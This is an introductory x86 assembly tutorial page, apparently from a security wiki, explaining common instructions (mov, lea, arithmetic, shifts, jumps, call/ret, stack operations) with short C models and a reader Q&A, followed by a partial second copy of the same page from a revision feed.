This section will go over some basic assembly instructions that you will likely see frequently. Some of the instructions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly comprises hundreds of different instructions, so you will likely want to find a complete reference book or website to have alongside you. This page, however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov dword ptr [ebx], 3 ; move the number 3 into the 4 bytes of memory that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
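<br />
The difference between the two extensions can be sketched in C. This is only a model of what the instructions do to a 16-bit value; the function names signExtend16 and zeroExtend16 are made up for this example.<br />

```c
#include <stdint.h>

/* movsx-like: if the top bit (the sign bit) of the 16-bit value is set,
   pad the upper 16 bits with F's; otherwise pad them with 0's. */
uint32_t signExtend16(uint16_t value)
{
    if (value & 0x8000u)
        return (uint32_t)value | 0xFFFF0000u;
    return (uint32_t)value;
}

/* movzx-like: the upper 16 bits are always 0, whatever the sign bit is. */
uint32_t zeroExtend16(uint16_t value)
{
    return (uint32_t)value;
}
```

With these definitions, signExtend16(0x8000) gives 0xFFFF8000 while zeroExtend16(0x8000) gives 0x00008000, matching the lists above.<br />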
<br />
=== lea ===<br />
''lea'' (load effective address) is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing''; it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax and store it in edi -- edi = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax points to an array of 16-bit (2 byte) <br />
values, and that ebx is an index into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
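<br />
Both uses of lea can be modelled in C as plain arithmetic. The sketch below assumes a flat address space (as on 32-bit x86 Linux or Windows), and the function names are invented for illustration.<br />

```c
#include <stddef.h>
#include <stdint.h>

/* What "lea eax, [esi+ecx*4]" computes: base + index * element size.
   Only the address is calculated; nothing is read from memory. */
uintptr_t elementAddress(uintptr_t base, size_t index, size_t elementSize)
{
    return base + index * elementSize;
}

/* What "lea edi, [eax+eax*2]" computes when used as quick math: value * 3. */
uint32_t tripleWithLea(uint32_t value)
{
    return value + value * 2;
}
```

For an array of 4-byte integers, elementAddress applied to the array's start and an index of 3 should give the same address as taking the address of element 3 directly.<br />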
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
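The instructions are mostly self-explanatory: and does a bitwise 'and', or does a bitwise 'or', and xor does a bitwise 'xor'. The odd one out is neg, which is arithmetic rather than bitwise: it computes the two's complement negation of its operand (eax = -eax). The instruction that inverts every bit is ''not''.<br />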
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, 0FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise inversion.<br />
not eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
neg eax ; eax = -eax -- two's complement negation: inverts every bit, then adds 1.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
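<br />
Bitwise inversion and arithmetic negation are easy to confuse, so here is a small C sketch of the two. It models the x86 ''not'' instruction (invert every bit) and the ''neg'' instruction (two's complement negation) on 32-bit values; the function names are chosen for this example only.<br />

```c
#include <stdint.h>

/* Models "not eax": every bit is flipped. */
uint32_t bitwiseNot(uint32_t value)
{
    return ~value;
}

/* Models "neg eax": two's complement negation, i.e. 0 - value.
   Unsigned arithmetic wraps around, which gives the same bit pattern. */
uint32_t twosComplementNegate(uint32_t value)
{
    return 0u - value;
}
```

For the value 5, bitwiseNot gives 0xFFFFFFFA (the same as 5 ^ 0xFFFFFFFF), while twosComplementNegate gives 0xFFFFFFFB, which is -5 and is exactly one more than the inverted value.<br />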
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow. Both multiplication and division make use of the register pair edx:eax, which is treated as a single 64-bit value with edx holding the upper 32 bits. <br />
<br />
''mul'' multiplies the unsigned value in eax by the operand, and stores the 64-bit result in edx:eax. ''imul'' does the same thing, except that the values are treated as signed. Here are some examples:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
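<br />
The way the product is split across edx:eax can be sketched in C with a 64-bit intermediate. MulResult and modelMul are hypothetical names used only to model the one-operand ''mul''.<br />

```c
#include <stdint.h>

/* The edx:eax register pair after a multiplication. */
typedef struct {
    uint32_t eax;  /* low 32 bits of the product */
    uint32_t edx;  /* high 32 bits of the product */
} MulResult;

/* Models "mul operand": unsigned eax * operand, with the 64-bit
   result split across edx (high half) and eax (low half). */
MulResult modelMul(uint32_t eax, uint32_t operand)
{
    uint64_t product = (uint64_t)eax * operand;
    MulResult result;

    result.eax = (uint32_t)product;
    result.edx = (uint32_t)(product >> 32);
    return result;
}
```

Multiplying 0x80000000 by 4 overflows 32 bits, so the model leaves 0 in eax and 2 in edx; a small product such as 3 * 5 leaves edx at 0.<br />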
<br />
''imul'' (but not ''mul'') also has a two-operand form, which multiplies the first operand by the second and stores the truncated 32-bit result in the first:<br />
imul ecx, edx ; ecx = ecx * edx (signed)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert doubleword to quadword." In other words, it converts the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is non-negative) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
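<br />
To see why edx has to be prepared before a division, here is a rough C model of ''div'' and ''cdq''. The names DivResult, modelDiv and modelCdq are assumptions for this sketch. It also assumes the operand is not zero and the quotient fits in 32 bits; on a real CPU either case raises a divide error instead of returning.<br />

```c
#include <stdint.h>

/* The registers after a division: quotient in eax, remainder in edx. */
typedef struct {
    uint32_t eax;
    uint32_t edx;
} DivResult;

/* Models "div operand": the 64-bit value edx:eax is divided by operand. */
DivResult modelDiv(uint32_t edx, uint32_t eax, uint32_t operand)
{
    uint64_t dividend = ((uint64_t)edx << 32) | eax;
    DivResult result;

    result.eax = (uint32_t)(dividend / operand);
    result.edx = (uint32_t)(dividend % operand);
    return result;
}

/* Models "cdq": returns the value placed in edx, which is all 0's or
   all F's depending on the sign bit of eax. */
uint32_t modelCdq(uint32_t eax)
{
    return (eax & 0x80000000u) ? 0xFFFFFFFFu : 0u;
}
```

With edx cleared, dividing 1007 by 10 gives a quotient of 100 and a remainder of 7. If edx were left holding 1 with eax at 0, the dividend would instead be 0x100000000, which is why leftover data in edx changes the answer.<br />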
<br />
=== shl, shr, sal, sar ===<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
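These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operands: the register to use, and the number of places to shift the value in the register. shl and sal are the same instruction. shr fills the vacated high bits with zeros (suitable for unsigned values), while sar fills them with copies of the sign bit (suitable for signed values). As computers operate in base 2, these instructions can be used as a faster replacement for multiplication and division by powers of 2.<br />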
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
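<br />
The difference between a logical right shift (shr) and an arithmetic right shift (sar) only shows up when the top bit is set. The C sketch below models both on 32-bit values without relying on how a particular compiler shifts negative numbers; the function names are invented, and the shift count is assumed to be between 0 and 31.<br />

```c
#include <stdint.h>

/* Models "shr": vacated high bits are filled with zeros. */
uint32_t shiftRightLogical(uint32_t value, unsigned count)
{
    return value >> count;
}

/* Models "sar": vacated high bits are filled with copies of the sign bit. */
uint32_t shiftRightArithmetic(uint32_t value, unsigned count)
{
    uint32_t shifted = value >> count;

    if (value & 0x80000000u)
        shifted |= (uint32_t)~(UINT32_C(0xFFFFFFFF) >> count);
    return shifted;
}
```

Shifting 0xFFFFFFF0 (-16 as a signed value) right by 2 gives 0x3FFFFFFC with the logical shift, but 0xFFFFFFFC (-4) with the arithmetic shift. For non-negative values the two agree.<br />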
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the instruction immediately following the call (the return address) onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the top value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address, which usually crashes the program. In some cases, it may jump to a valid but wrong address, where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack pointer immediately after the return address is popped, which allows the function to remove values that were pushed onto the stack before the call. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' is used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
; nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares two operands and sets or unsets flags in the [[Registers#flags|flags]] register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' between the two operands instead of a subtraction, again throwing away the result. ''test'' is most commonly used with the same register as both operands (for example, ''test eax, eax'') to check whether it is zero.<br />
<br />
=== jz/je, jnz/jne, jl, jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
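* ''jl'' jumps if the first parameter is less than the second in a signed comparison. ''jb'' ("jump if below") is its unsigned counterpart; the two are not synonyms, because they check different flags. <br />
* ''jg'' jumps if the first parameter is greater than the second (signed). <br />
* ''jle'' jumps if the first parameter is "less than or equal to" the second (signed); that is, if the 'zero' flag is set or the 'sign' and 'overflow' flags differ. <br />
* ''jge'' jumps if the first is "greater than or equal to" the second (signed).<br />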
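<br />
Signed and unsigned conditional jumps can give different answers for the same pair of register values. The C sketch below models the condition checked by jb (unsigned "below") and by jl (signed "less") after a cmp; isBelow and isLess are made-up names for this illustration.<br />

```c
#include <stdint.h>

/* Condition for "jb" after "cmp a, b": a is below b as unsigned numbers. */
int isBelow(uint32_t a, uint32_t b)
{
    return a < b;
}

/* Condition for "jl" after "cmp a, b": a is less than b as signed numbers.
   Flipping the sign bit of both values maps the signed ordering onto the
   unsigned one, which avoids converting out-of-range values to int32_t. */
int isLess(uint32_t a, uint32_t b)
{
    return (a ^ 0x80000000u) < (b ^ 0x80000000u);
}
```

With a = 0xFFFFFFFF and b = 1, isBelow is false (4294967295 is not below 1) but isLess is true (-1 is less than 1). For small positive values the two conditions agree.<br />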
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Instructions in this section are used for adding data to and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used instructions. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
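<br />
In the meantime, the downward growth of the stack can be modelled with a small C sketch. Here esp is an index into an array of 4-byte slots rather than a real address, and the type and function names (Stack, stackInit, stackPush, stackPop) are assumptions made for this example.<br />

```c
#include <assert.h>
#include <stdint.h>

#define STACK_SLOTS 16

typedef struct {
    uint32_t memory[STACK_SLOTS];
    int esp;  /* index of the top of the stack; STACK_SLOTS means empty */
} Stack;

/* The stack starts at the highest position and grows downwards. */
void stackInit(Stack *stack)
{
    stack->esp = STACK_SLOTS;
}

/* Models "push": decrement esp first, then store at the new location. */
void stackPush(Stack *stack, uint32_t value)
{
    assert(stack->esp > 0);
    stack->esp -= 1;
    stack->memory[stack->esp] = value;
}

/* Models "pop": read from the current location, then increment esp. */
uint32_t stackPop(Stack *stack)
{
    uint32_t value;

    assert(stack->esp < STACK_SLOTS);
    value = stack->memory[stack->esp];
    stack->esp += 1;
    return value;
}
```

Pushing 1 and then 2 moves esp down by two slots, and the values come back off in the opposite order: 2 first, then 1.<br />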
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all eight 16-bit or 32-bit general-purpose registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore the 16-bit or 32-bit general-purpose registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Won't this just loop forever because ecx is never incremented? Total noob here so I may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, the stack is decremented when pushed, but increased when popped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3139Simple Instructions2012-01-16T00:52:20Z<p>Killboy: /* cmp, test */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the instructions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly comprises hundreds of different instructions, so you will likely want to find a complete reference book or website to have alongside you. This page, however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov dword ptr [ebx], 3 ; move the number 3 into the 4 bytes of memory that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' (load effective address) is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing''; it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax and store it in edi -- edi = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax points to an array of 16-bit (2 byte) <br />
values, and that ebx is an index into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
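The instructions are mostly self-explanatory: and does a bitwise 'and', or does a bitwise 'or', and xor does a bitwise 'xor'. The odd one out is neg, which is arithmetic rather than bitwise: it computes the two's complement negation of its operand (eax = -eax). The instruction that inverts every bit is ''not''.<br />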
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, 0FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise inversion.<br />
not eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
neg eax ; eax = -eax -- two's complement negation: inverts every bit, then adds 1.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow. Both multiplication and division make use of the register pair edx:eax, which is treated as a single 64-bit value with edx holding the upper 32 bits. <br />
<br />
''mul'' multiplies the unsigned value in eax by the operand, and stores the 64-bit result in edx:eax. ''imul'' does the same thing, except that the values are treated as signed. Here are some examples:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
''imul'' (but not ''mul'') also has a two-operand form, which multiplies the first operand by the second and stores the truncated 32-bit result in the first:<br />
imul ecx, edx ; ecx = ecx * edx (signed)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert doubleword to quadword." In other words, it converts the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is non-negative) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
=== shl, shr, sal, sar ===<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
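These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operands: the register to use, and the number of places to shift the value in the register. shl and sal are the same instruction. shr fills the vacated high bits with zeros (suitable for unsigned values), while sar fills them with copies of the sign bit (suitable for signed values). As computers operate in base 2, these instructions can be used as a faster replacement for multiplication and division by powers of 2.<br />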
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the instruction immediately following the call (the return address) onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the top value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address, which usually crashes the program. In some cases, it may jump to a valid but wrong address, where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack pointer immediately after the return address is popped, which allows the function to remove values that were pushed onto the stack before the call. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' is used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
; nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares two operands and sets or unsets flags in the 'flags' register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
